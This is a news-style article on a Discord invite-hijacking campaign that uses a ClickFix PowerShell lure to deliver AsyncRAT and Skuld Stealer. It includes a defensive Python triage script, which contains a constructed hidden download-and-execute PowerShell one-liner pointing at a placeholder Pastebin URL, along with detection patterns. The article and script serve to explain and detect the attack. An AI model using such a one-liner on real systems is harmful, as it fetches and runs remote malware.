1,300 unsuspecting gamers have already fallen for this trap.
Cybercriminals have discovered a new method to weaponize old Discord invite links: a scheme that turns expired vanity invites into malicious traps. Researchers at Check Point uncovered this vulnerability in June 2025, revealing a global threat stemming from Discord’s invite system design.
The Attack Explained
The core of the attack involves hijacking expired vanity URLs, which are custom invite links available to Discord servers with a Boost Level 3 subscription. Once a server loses premium status or the invite expires, the previously used URL becomes available for re-registration. Attackers quickly claim these now-free URLs and link them to their own malicious servers, which are visually indistinguishable from legitimate communities.
Victims, unaware of the switch, click on old invite links still found on forums, social media, or websites, unknowingly entering attacker-controlled spaces. The infection chain emphasizes stealth, social engineering, and evasion of antivirus detection.
Step-by-Step Exploitation
Once inside the fake Discord server, the user is greeted by a bot named "Safeguard", custom-built for this campaign. The bot prompts the user to verify themselves, mimicking official Discord procedures.
Upon clicking the verification button, the user is redirected to a fake webpage that imitates the Discord interface. The page pretends that a Google CAPTCHA has failed to load and instructs the user to enter verification commands manually. This is where the attack begins: clicking the button silently copies a malicious PowerShell command into the clipboard.
Next, the user is told to press Win+R, paste the command, and hit Enter. The user never downloads a file themselves, which lowers suspicion and sidesteps file-based antivirus scanning. The pasted command decodes a Base64 string that fetches and executes a multi-stage malware script hosted on Pastebin.
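A defender-side triage check for the Win+R step above, added here as an example and not taken from Check Point's report: it inspects Windows RunMRU values (the registry key that records Run-dialog history), decodes any PowerShell -EncodedCommand argument, and flags download-and-execute one-liners that point at the hosting services the article names. The sample entries, the PLACEHOLDER URL and the function names are constructed for this example.

```python
import base64
import re

# Hosts the campaign abuses as staging; combined with an execute cmdlet they indicate a lure.
SUSPICIOUS_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "bitbucket.org")
EXEC_PATTERNS = re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b")
# Any accepted spelling of the -EncodedCommand switch followed by its base64 argument.
ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(blob: str) -> str:
    """PowerShell -EncodedCommand carries UTF-16LE text, base64-encoded."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_run_command(cmd: str) -> dict:
    """Score one Run-dialog command the way a ClickFix triage script would."""
    result = {"powershell": False, "decoded": "", "hosts": [], "exec": False, "suspicious": False}
    if not re.search(r"(?i)\bpowershell(\.exe)?\b|\bpwsh\b", cmd):
        return result
    result["powershell"] = True
    m = ENC_FLAG.search(cmd)
    # Fall back to the raw command line when no encoded argument is present.
    body = decode_encoded_command(m.group(1)) if m else cmd
    result["decoded"] = body
    result["hosts"] = [h for h in SUSPICIOUS_HOSTS if h in body.lower()]
    result["exec"] = bool(EXEC_PATTERNS.search(body))
    result["suspicious"] = bool(result["hosts"]) and result["exec"]
    return result

def flag_runmru(entries: dict) -> list:
    """Return the names of RunMRU values that look like ClickFix lures."""
    return [name for name, cmd in entries.items() if analyze_run_command(cmd)["suspicious"]]

# Constructed sample: RunMRU values (each ends in "\1" as Windows writes them)
# after a user followed a ClickFix lure. The URL is a placeholder, not a real indicator.
LURE = "iex (iwr 'https://pastebin.com/raw/PLACEHOLDER').Content"
ENCODED = base64.b64encode(LURE.encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": f"powershell -w hidden -enc {ENCODED}\\1",
}

if __name__ == "__main__":
    print("flagged RunMRU entries:", flag_runmru(SAMPLE_RUNMRU))
```

On a live host the same function can be fed the values read from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU during triage.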
Malware Delivered
The downloaded payload includes:
- AsyncRAT (remote access trojan)
- A custom version of Skuld Stealer, designed to target crypto wallets and digital asset credentials
All malicious operations, including data exfiltration, are conducted via legitimate cloud platforms such as GitHub, Bitbucket, Pastebin, and even Discord itself. Because this traffic blends in with ordinary use of those services, the malware is harder to detect.
Global Impact
According to Check Point, at least 1,300 users from the USA, Vietnam, France, Germany, and the UK have been affected. The attackers are financially motivated, targeting crypto holders and digital asset owners.
Psychological Engineering: ClickFix
The attack technique, dubbed ClickFix, showcases a highly refined level of psychological manipulation. The malicious code requires no downloads, appears as a routine step-by-step guide, and exploits user trust in Discord's interface and typical Windows behavior. This unobtrusive, convincing, and scalable method makes the campaign especially dangerous and effective.
